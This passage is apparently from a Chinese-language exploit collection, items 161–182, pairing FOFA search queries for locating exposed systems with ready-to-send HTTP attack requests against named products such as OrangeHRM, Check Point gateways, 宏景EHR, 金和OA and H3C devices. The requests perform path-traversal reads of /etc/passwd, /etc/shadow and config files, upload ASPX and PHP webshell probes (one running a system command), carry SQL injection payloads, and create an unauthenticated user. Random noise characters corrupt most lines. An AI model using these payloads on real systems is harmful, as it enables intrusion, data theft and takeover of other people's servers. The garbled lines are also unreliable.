5 X8 \* ?- I( k9 ]! GFOFA:title="Nexus Repository Manager"7 ~! s  a3 u- h5 h) O- O8 F# R
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
: N: b* W- I6 J' g' V2 `Host: x.x.x.x  t$ n4 W+ ]% j3 f8 n
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
6 C2 t$ c- u* F  d; D! A, b1 S/ wConnection: close$ i7 o& t: T6 S# N1 l
Accept: */*
2 z, Q% [( F" X( f- F8 N3 NAccept-Language: en$ \* o) u5 k0 \: y: P  c% w5 n% k: u
Accept-Encoding: gzip
3 a1 v9 w) s4 h/ _- S8 J% D8 i$ {3 B4 J

! ?6 t7 a9 P; q4 a& G3 {161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
/ o% b2 W/ }9 Z. [* h$ HFOFA:body="/KT_Css/qd_defaul.css"- X* @* V$ [9 F( j+ Q9 N& M
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
/ ?5 o9 L2 k* H* @" ^POST /Webservice.asmx HTTP/1.1- |( z; e8 F2 T, B% _" |# u8 u- ]
Host: x.x.x.x
4 `: F1 F* i+ \8 j+ L$ t# M' hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
3 a  R' h! h( Q; N1 ^Connection: close* f4 v2 N# E6 U# }+ P
Content-Length: 445
+ u1 n6 ?$ F+ P, T0 e4 z5 iContent-Type: text/xml7 |5 c; ?0 g3 C( c8 x3 _
Accept-Encoding: gzip
3 @$ H/ i& }& P) {; k$ C& j7 u, a* J5 _! F# @+ {) S
<?xml version="1.0" encoding="utf-8"?>5 \; @5 ~/ i+ H5 H3 v7 {  x+ z6 r
<soap:Envelope xmlns:xsi="7 V3 y6 D3 @3 H# q1 R, q
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"4 G: ]9 D9 R( K" I8 M1 Q" q
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">* Z5 @+ l9 }! D% D  \* o
<soap:Body>4 f+ e  Q# Z. C
<UploadResume xmlns="http://tempuri.org/">
$ |5 {. P4 O7 V+ {, A' B) a<ip>1</ip>
9 O! `: _* {: ~6 a<fileName>../../../../dizxdell.aspx</fileName>
. p3 P) o5 x0 A. c9 U8 x, y6 S<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>$ p/ |% v3 m; Z. P# Z' k3 b
<tag>3</tag>% W0 Y8 P- v% Z% C! [
</UploadResume>
6 T8 _- m6 b- B' F7 a2 L9 d' N</soap:Body>
1 k# q0 `  {4 M! z% z# }, d$ z4 n# u3 W. z</soap:Envelope>9 A$ m& L; U- T- T; o

0 e! \* n" s. a! T2 y, ?4 i% q' ?2 O! _/ e8 X
http://x.x.x.x/dizxdell.aspx6 {$ X$ z* a: Y3 Y- C3 c8 g' G

7 m5 _8 C' _) D! n& e, P& O! m162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
2 q5 v4 W- ?: x2 n+ CFOFA: app="和丰山海-数字标牌". K6 N9 o- p# b& P" e8 ~% I
POST /QH.aspx HTTP/1.10 k) b3 S- K1 j4 r
Host: x.x.x.x. o; ^$ g- b2 Z2 z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0, `0 E( [% h0 ^. v: y2 Z" k2 A; y
Connection: close$ p3 A- ]8 c# s, N  x$ u
Content-Length: 583" D( A6 m  ?4 g+ A
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey) {- P( H1 R! p! t4 `
Accept-Encoding: gzip
: e* [6 b$ I! i- k4 n5 N- J6 |; J; j( q/ a7 A$ _, l
------WebKitFormBoundaryeegvclmyurlotuey( K2 g$ j: ]; ?1 |; U
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"' v7 M$ L: x6 [4 t- S
Content-Type: application/octet-stream# A% c/ s$ H( x$ ^9 }  ?
. x$ V- R* Y5 N( @/ ?- h- M/ t
<% response.write("ujidwqfuuqjalgkvrpqy") %>
4 C- d+ K3 ~8 X$ a. z------WebKitFormBoundaryeegvclmyurlotuey
0 e& i' Z. _% t: sContent-Disposition: form-data; name="action": P4 T! r  X% o; \
! L7 O1 Z6 W3 A' z  E
upload3 S* M% U. }) z* k. v! I: R
------WebKitFormBoundaryeegvclmyurlotuey
3 w! @% C4 `. H3 rContent-Disposition: form-data; name="responderId"9 r) a& `' I5 F/ A" j9 L1 U
/ Y) O) u! N$ A+ ~9 ?7 m% m
ResourceNewResponder
/ u( j( F* N) Y% T% i$ G( o& B! t------WebKitFormBoundaryeegvclmyurlotuey
5 P6 b* o  r' P1 P& v) UContent-Disposition: form-data; name="remotePath"8 V  B& \8 @$ ~3 Q, O1 I8 F) k
2 Z0 @- `6 l3 L- l
/opt/resources1 \# P) Q7 y- U8 q0 c! @
------WebKitFormBoundaryeegvclmyurlotuey--! w( p; \# k& [. S6 G( a
* t2 z3 s. p1 T+ _, C, B
6 r# ~' _) p3 z7 {
http://x.x.x.x/opt/resources/kjuhitjgk.aspx8 A) d8 R5 W* B- Y

6 o: x7 J3 @: c# [' |163. 号卡极团分销管理系统 ue_serve.php 任意文件上传; Q! y: \1 a, U/ p) a. N
FOFA: icon_hash="-795291075"
4 r# L" u9 @" I" z0 H0 [. tPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.13 H, Q" {4 T5 d. J( t/ q0 {
Host: x.x.x.x7 |0 X5 y9 X$ m9 h( E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36' R% q* l# n3 ^' I3 i
Connection: close
* g' b  Y7 j0 V3 aContent-Length: 2931 _0 c+ R; \5 q8 h
Accept: */*
5 B6 r! Z) B0 U- x4 y4 g# {' d& ]Accept-Encoding: gzip, deflate
$ Y# H9 d7 U: C9 _$ YAccept-Language: zh-CN,zh;q=0.9
& Z! u/ G3 A" M6 g' J- wContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod* @# s) X( H- `3 L* n2 U
! ^. H% i+ @9 N: i0 [5 f7 _
------iiqvnofupvhdyrcoqyuujyetjvqgocod, q/ w# T: r# U! I# [: l1 m) m
Content-Disposition: form-data; name="name"/ ]$ ]+ ]9 [/ U+ D8 ], i
) n8 D$ J; Z# ~" O7 X
1.php
& e4 w; F( L8 {7 a  G------iiqvnofupvhdyrcoqyuujyetjvqgocod/ r& H7 \& }' Y3 M6 g
Content-Disposition: form-data; name="upfile"; filename="1.php"
) T+ v, d/ B. h. K, q1 Z6 l' h) QContent-Type: image/jpeg
1 E  T8 X# o1 p: C3 W) w+ E+ R+ H' q/ B2 i
rvjhvbhwwuooyiioxega. q$ _8 t" S+ r% v' r3 l) H' ^2 ^
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
' f/ W) V$ y9 q5 D  x7 e* u( d; Q) u! P! k" z

! I& \2 q% z5 K  g1 \0 c164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
6 M: t. M$ H& D- a$ i$ v5 c+ rFOFA: title="智慧综合管理平台登入"8 m; C% ^5 I7 T
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.14 H7 M/ W! _) s
Host: x.x.x.x1 S4 z; H& ^- a) y0 U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
2 w% W1 w0 j' {, M2 P$ ?8 F$ iContent-Length: 288  R: \5 ~5 j% g. V
Accept: application/json, text/javascript, */*; q=0.01
1 r3 P* N1 c% n1 q5 G# CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
; o! F; o+ v' o9 j8 r' @& c3 AConnection: close4 s8 B6 _: o7 H9 ?* A& Y
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
; o9 u6 g6 v5 |' n; qX-Requested-With: XMLHttpRequest7 m, t, v0 s4 x4 P& Y- n, s) i
Accept-Encoding: gzip4 k" O: A( m7 }7 f" P/ G1 c
- V9 S: ^& H! X; p4 V7 R7 d+ u
------dqdaieopnozbkapjacdbdthlvtlyl6 g; q2 X& \% a+ Z8 L
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
2 v" Y7 t$ o# z+ O: ~5 U, aContent-Type: image/jpeg* W9 ~' G) x8 l, S5 k! o

) G4 c3 h+ Z7 C  c8 ^7 f9 `<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
1 q7 B) e0 E  t" }7 Z' l& V------dqdaieopnozbkapjacdbdthlvtlyl--
( J$ N# G  J8 w) D3 I& G8 K6 {! t* Q, b$ O" k& ?

8 P. h, ?# k* a; a( W; ?+ whttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
* T0 F: o3 w- x' e% c$ l2 s: K# L, B
( t5 d, j) O; ~165. OrangeHRM 3.3.3 SQL 注入* ~  L9 G. s3 [3 M7 L, s- q
CVE-2024-36428, U- @& K4 S1 K7 l1 O
FOFA: app="OrangeHRM-产品"! p9 V& {9 m% q7 Z
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))# t) N$ d4 f5 }
4 Z5 y7 Z( ]- {. L0 O: C

/ F$ W; a& B" z166. 中成科信票务管理平台SeatMapHandler SQL注入
5 u! n' o) J5 U% I1 x6 jFOFA:body="技术支持:北京中成科信科技发展有限公司"6 c' s3 S/ l8 V2 U7 z
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
4 S, i6 ?% ]( @( p( |5 rHost:
& t- Z6 M( [: d6 S4 U, tPragma: no-cache& N' _$ n) b6 u  g- ]' c% s
Cache-Control: no-cache
4 s2 {: D: s6 {$ }. WUpgrade-Insecure-Requests: 1  C0 r* V9 M, \1 x8 @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.366 u9 ]' s% H* Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 G5 Y) n, s7 p, M5 d; o; OAccept-Encoding: gzip, deflate
+ d2 [, r! F/ R: k6 k4 xAccept-Language: zh-CN,zh;q=0.9,en;q=0.8( ^( v' q$ L( p3 V: G! [' ?
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
2 Z) ?/ b5 a- m3 Q; v; RConnection: close
$ ?0 d$ U) T$ z) u: PContent-Type: application/x-www-form-urlencoded: E9 B# l! d  p# @
Content-Length: 89- \  U/ N1 o* ~
; F% j+ R- u, e) U) \
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE! x2 O' ?! j* G  J* b& _+ g

/ \, O% t$ Z/ p3 G2 [
3 B$ p0 B8 O5 V$ A# m' o167. 精益价值管理系统 DownLoad.aspx任意文件读取
( n! I8 m4 ?! f! z' O' wFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"5 d/ j1 [% C) o# }  ^
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1& m5 I7 Q+ W# h, {% c
Host:5 L4 @3 C% i5 h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; W; t6 I$ @7 f8 UContent-Type: application/x-www-form-urlencoded
& }+ V# q6 s$ ZAccept-Encoding: gzip, deflate- w* z+ r0 A0 y$ y, Y
Accept: */*
. X6 C1 I& o9 LConnection: keep-alive
9 C: R) j1 ]" D& f2 v" b- x% B% ~5 U) M6 R
% V, Q1 {+ S3 N( q0 i! z1 R6 D( o
168. 宏景EHR OutputCode 任意文件读取7 S8 S, p) |  O8 W# F5 s
FOFA:app="HJSOFT-HCM"/ \+ G9 ~, G8 [6 E# O( r
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.17 [$ u1 J8 [* N3 y; K6 `! p8 h
Host: your-ip
+ s5 ]" i5 t! d2 yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36; x: f+ U( I6 m/ b' f
Content-Type: application/x-www-form-urlencoded. x$ J9 j2 X' O: I8 g9 j# \1 p6 E/ J
Connection: close
+ J* ?" m+ R( ?" y, ]4 Z
1 f+ x( C7 I0 ^, I
' j9 {1 Z, W" ?/ P* S9 |# w# ?/ E: f! s+ c  ~+ B
169. 宏景EHR downlawbase SQL注入4 X9 Q' r3 m4 W; m2 r
FOFA:app="HJSOFT-HCM"
) r* O; R+ o5 w/ wGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
5 n3 r# F! }- ^) M, Y, MHost: your-ip
, z6 @  T9 Q5 Y2 ?' f6 y- nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 S3 `8 \1 C: \( L6 g0 ~, h+ iAccept: */*
1 @# R5 E7 a, |7 ~* P0 `6 jAccept-Encoding: gzip, deflate  R; T* w( w$ n
Connection: close
1 q3 u& h( @6 ?, }/ h4 k
4 A, U( p! @! C  T/ ?% r
! ]' U; W: \  F9 d( E3 f9 U1 x4 H! U: p# |% I
170. 宏景EHR DisplayExcelCustomReport 任意文件读取9 H* n0 l1 P6 t) b
FOFA:body="/general/sys/hjaxmanage.js"
5 L% I$ W, Q) v! ePOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
3 r8 e4 h: T* w) VHost: balalanengliang
/ E) N8 J0 w2 B% F" ]1 s  aUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' e, Z# n$ a5 n1 C6 F
Content-Type: application/x-www-form-urlencoded+ A" h3 j4 h6 x5 Q2 u0 A2 ]* S" A& e; v

( Y: Q  ]4 B# }" U- h0 g3 jfilename=../webapps/ROOT/WEB-INF/web.xml; ]8 X5 c0 Q4 B$ K+ J

  d  M8 O  @" Y
" y) S. E) u# D" ]6 e( B! i/ C+ U171. 通天星CMSV6车载定位监控平台 SQL注入
1 y( T2 ~  n0 `& jFOFA:body="/808gps/"4 N, c2 f' w( _6 X1 g! p
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
3 t8 D3 \0 U- h9 G' NHost: your-ip9 I2 C8 ?1 L( F! W7 Z* o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
- h/ N2 l% d3 t5 [  QAccept: */*) W. F& Y+ P( ?8 x; d/ h
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 ?  m' y+ j% r5 pAccept-Encoding: gzip, deflate( ^1 k( M, u) ]# l5 L, [/ ?. m
Connection: close, x6 x" v& g# [: c

$ {+ `. p' ]# h3 [: ^  o
. ~' g) X* A" `3 D8 b0 R8 L" [+ R1 ~4 s
172. DT-高清车牌识别摄像机任意文件读取! E1 [; j1 I$ Y$ |
FOFA:app="DT-高清车牌识别摄像机"% O- Z1 }6 I7 z( z: p) {- S
GET /../../../../etc/passwd HTTP/1.1' p) @2 o1 ?7 @0 w$ X3 s& o' U
Host: your-ip
+ |: b. Q( v5 @2 z7 e, J1 r5 yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
! `/ ~; ^$ n2 s  ^$ d( _8 pAccept-Encoding: gzip, deflate8 H5 \8 W! y8 n- R; w. A( c  t
Accept: */*' `1 K6 W& \2 {9 z
Connection: keep-alive
  ?, b1 C6 @$ q* W" X5 X5 A$ ]( o1 O' q: D( T; E, u; ~

/ M$ g/ O: N3 o2 c9 O- b: \3 m5 @3 B7 |1 B) Y8 ]! `
173. Check Point 安全网关任意文件读取7 A# y2 U) @# R4 h
CVE-2024-24919' D  j7 V* g$ C
FOFA:app="Check_Point-SSL-Network-Extender"
8 H6 E; C$ e' }" a5 GPOST /clients/MyCRL HTTP/1.1" b5 H% X: A9 \
Host: your-ip
% C+ o. E( h/ z* ^8 oContent-Type: application/x-www-form-urlencoded; p- C! p- z7 P8 ]) N# x, a1 r

8 g% d/ \2 @2 q( ZaCSHELL/../../../../../../../etc/shadow
! q. I7 I) _- ~
. `- k5 s5 C! [2 y- t) B" z
, B6 W. S5 c) J" Z2 v* B; b4 K) t' n5 @
174. 金和OA C6 FileDownLoad.aspx 任意文件读取& f1 C$ \$ R  a! {' ]! l
FOFA:app="金和网络-金和OA"
9 ?5 @7 o" o9 D+ g, QGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
. T! |3 L+ Z' G3 vHost: your-ip
2 t4 f" \2 m  J4 \1 v: D% }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36- n' z: M3 x$ D7 ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ L" b. M2 ?* V7 dAccept-Encoding: gzip, deflate, br# P) z( j  f( A! ]2 r( e$ }
Accept-Language: zh-CN,zh;q=0.9
% C% C6 _: H3 J6 \9 _& z3 ]Connection: close, S% |* x  H' u, o5 b  e1 M4 {: n+ r
4 R* r/ Q, s/ Q6 H- i+ g, ~

0 W; s* U3 C1 J) P3 E8 a( x2 v- w; h) l; b
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
5 P/ d) p+ X; y: KFOFA:app="金和网络-金和OA"1 a) u+ a3 K$ ^6 v
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1; k: H$ O) U" o% `4 N
Host:
1 {2 d# n. m; DUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
6 g6 w* ^2 G  L9 ?7 \$ {' a" Q) V, dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( @& K. Z" r! E% l' B+ R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" {8 \/ P% e3 H5 I$ k. t
Accept-Encoding: gzip, deflate# s8 X/ v; G; j* d) Z" w( X
Connection: close
0 d+ ?" k( b) ?& _+ ~* c' MUpgrade-Insecure-Requests: 1* s. y( s% s7 u. }
8 h; _) t% v6 f- Z2 c# m

& J- y$ |- I4 F2 Q9 C176. 电信网关配置管理系统 rewrite.php 文件上传: ?  Z1 @, |8 r* ^8 Y
FOFA:body="img/login_bg3.png" && body="系统登录"
7 ^. L3 c  i$ b4 Q0 U' u+ mPOST /manager/teletext/material/rewrite.php HTTP/1.1# s" f, t% N) k0 j8 o3 B* c
Host: your-ip5 p5 B0 Q* Z& k: i' ?/ n# c0 N3 d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0$ y0 G( k! l- Z+ h+ {  u
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT- b( l! r( C* z' g' z+ k
Connection: close  I: D. k" @1 ]7 x: E% h

* q* C9 b( F* e# {4 E------WebKitFormBoundaryOKldnDPT
' {+ h5 s* p% r% `. E+ ?Content-Disposition: form-data; name="tmp_name"; filename="test.php"# c. H  ?, D  B* Q
Content-Type: image/png4 Q( C' a( E% X# M
7 {; D4 `& v8 K- ~: o
<?php system("cat /etc/passwd");unlink(__FILE__);?>% ^4 ~3 J1 K  t! g7 _
------WebKitFormBoundaryOKldnDPT! {) g" M6 g9 `# [; t- q0 d
Content-Disposition: form-data; name="uploadtime"" N6 q2 q( K, z

$ @* s9 k/ f7 C( v3 F $ s- i8 K/ g; X& Z3 E) d
------WebKitFormBoundaryOKldnDPT--
$ K( v/ G; n% D) \, z
7 Q4 `$ @8 s# T
2 r# b& t* l! Q- N! J: b5 N2 r5 r5 I7 [" K$ M# r9 |3 `
177. H3C路由器敏感信息泄露
. }, Q8 R( e+ N7 n$ v  m! X/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
1 _$ N, W6 z( a6 o; |/userLogin.asp/../actionpolicy_status/../M60.cfg
7 d% Y0 T& C. i& r$ d( w' Y. A/userLogin.asp/../actionpolicy_status/../GR8300.cfg9 @  l1 O5 I2 x* h( ^8 i: ^
/userLogin.asp/../actionpolicy_status/../GR5200.cfg6 X% E; j! O3 I4 ]+ p
/userLogin.asp/../actionpolicy_status/../GR3200.cfg2 W" v) `: y" k$ V7 ^, f
/userLogin.asp/../actionpolicy_status/../GR2200.cfg- d" I8 C1 f& P% u4 ]
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg0 R2 _# R, d1 q( ~( y  E. q
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
2 B& V$ Y- C; @( B/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
( m9 \0 t# F7 }! m2 y0 W8 c( k/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg4 i6 ^+ s1 u5 i0 c* X( e! s, C$ M0 G9 R
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
( ~* W$ B4 y# D& b) V5 ?/userLogin.asp/../actionpolicy_status/../ER5100.cfg
4 H) q+ Q* s- g0 G4 T5 ?# h  C/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg9 P/ |8 n8 f$ y4 K4 [
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
1 o! |+ Y1 Z2 p' }0 l/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg% P7 m) \  R, [7 z/ @
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
7 p! `  R! P2 X3 |& ]7 [1 }# w( I/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
1 k4 y& ?* v4 E8 w2 R; o/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
( R: G" v- b2 o/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg, ?! U2 Q3 g  C- E# _
/userLogin.asp/../actionpolicy_status/../ER3100.cfg2 X0 j, m  Y: q2 V+ r
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg6 t* k7 W+ ~# M) Q8 C! R
4 U1 [$ T4 y0 k$ P: ]

6 u' R) ^: Z4 b* f; h* S178. H3C校园网自助服务系统-flexfileupload-任意文件上传
% `8 r( I% K, D/ o% a1 y" R# tFOFA:header="/selfservice"
% d3 c0 K6 A1 x. x7 ]+ cPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1: J* C; V" ~" D! }7 L
Host:) h0 D' }2 s4 p  X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
. B. F; k( H. UContent-Length: 2524 k' ~& ?6 C  D- ]$ J! k' Y
Accept-Encoding: gzip, deflate. L! [) f2 Z; Y: H7 x
Connection: close
2 u3 J8 Q  B0 e, k2 H/ m% gContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
: T- q3 F4 g, O  ?( f-----------------aqutkea7vvanpqy3rh2l% c2 K. s, u( L
Content-Disposition: form-data; name="12234.txt"; filename="12234") p1 w- s: s; z. g9 q: G( x
Content-Type: application/octet-stream
! d( Z* k: T8 Q0 \" wContent-Length: 255
* m% b0 X, P5 n( u
$ T/ L; f5 X1 @$ V' |  J12234, v3 ^; B0 d5 a! _
-----------------aqutkea7vvanpqy3rh2l--
7 G" M; |6 f* c& c0 ^3 v! S6 \# F# F/ V# b) M2 Y
# D# U9 m( b6 {) q
GET /imc/primepush/%2e%2e/flex/12234.txt
# m7 i( x: u3 F9 C. l* y8 _1 p8 R0 M; \1 F9 \1 a" U. A( \

3 k+ |/ O  M) L# F179. 建文工程管理系统存在任意文件读取
5 U( B( P2 Y  j; cPOST /Common/DownLoad2.aspx HTTP/1.15 _7 j0 F# w/ f7 q
Host: {{Hostname}}
" P3 [* l. R6 O/ ]. T$ ~Content-Type: application/x-www-form-urlencoded
3 F( r) c3 S6 ?( }; Z# c3 MUser-Agent: Mozilla/5.0, v/ ~, ?( h! k7 Y- i

- A+ x" X, L  ?2 ^/ I( z* |path=../log4net.config&Name=
: W" P3 H. P8 B  X3 R6 `$ T% F& K
/ Y9 e) a- l: ?! M# |) `
, g( d& y1 f( r% D180. 帮管客 CRM jiliyu SQL注入
7 y1 v' B: N; E9 W5 O( U* OFOFA:app="帮管客-CRM"
5 o) ~: m4 Q6 W) C& G* |GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1' v; e; X; ?1 g1 l' k% J, {/ ~, q
Host: your-ip6 w8 [$ f% k% r( v; a2 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
2 I* }/ O( ^) c1 c  z  }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' ~) A( H! L4 K' A( ]( q' n5 k
Accept-Encoding: gzip, deflate
5 v$ ]( r4 D1 m7 {/ z* }& w8 bAccept-Language: zh-CN,zh;q=0.96 T2 {" y! C; N1 w0 N0 m
Connection: close
8 Q% ]( G) b- o+ X) J2 Q& j3 L* d; F* E- x+ a6 ~, W. @
( e; x. r5 ^( j- D& H/ v$ }
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入) f  |* \! v1 \' y2 r
FOFA:"PDCA/js/_publicCom.js"3 `/ U; A- N* c- w
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
0 c4 l7 m' b  Z( zHost: your-ip5 f- W, z. ]5 g0 u$ V" x. T! N/ t; S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
7 @) f+ l% N& |. w( X5 xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 V6 x9 |  e1 b) ]7 r* ^9 c4 F: e
Accept-Encoding: gzip, deflate, br
: `( E# z/ [4 W" H5 mAccept-Language: zh-CN,zh;q=0.9
* A- `# U7 h. r( x4 P0 n5 T" `Connection: close" ^# c% s+ e& r+ e7 t
Content-Type: application/x-www-form-urlencoded
' p$ W+ s  m9 [0 O
: B3 t2 F# b9 G" X+ J. Z- ~8 ]' D: _1 Q+ T4 l4 \! x" j9 S+ W
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=200 H4 [6 h; ?1 J/ c: B1 R  i# {' l, p

/ I: t' n7 B! l1 \) K7 _0 \+ h8 O; E- q; N) G- \/ J
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
- L& P  N* a  O! w: b$ L: {+ O! GFOFA:"PDCA/js/_publicCom.js"4 G' }7 V$ Q" ^* \! k
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
: U( O) O) J7 s5 H: Q( R" HHost: your-ip  q  P1 l' i+ u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
6 Z0 }/ O$ A* nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 z) z* z; N) A% Y, t
Accept-Encoding: gzip, deflate, br2 y% |! U1 X2 B- ]+ X
Accept-Language: zh-CN,zh;q=0.9
9 x2 Z2 d* q3 W1 q% A: Y7 bConnection: close9 a5 c: M" [* a6 ^
Content-Type: application/x-www-form-urlencoded* @! \1 j% b5 L0 ]9 L5 y
' q/ ]9 l' o9 d# ~( x6 ^& h

8 N& ?. A$ Q" |+ _+ @7 ousername=test1234&pwd=test1234&savedays=1/ q; N, E7 L; r1 `( t! i
: [( j% [2 A+ ?0 ^4 n

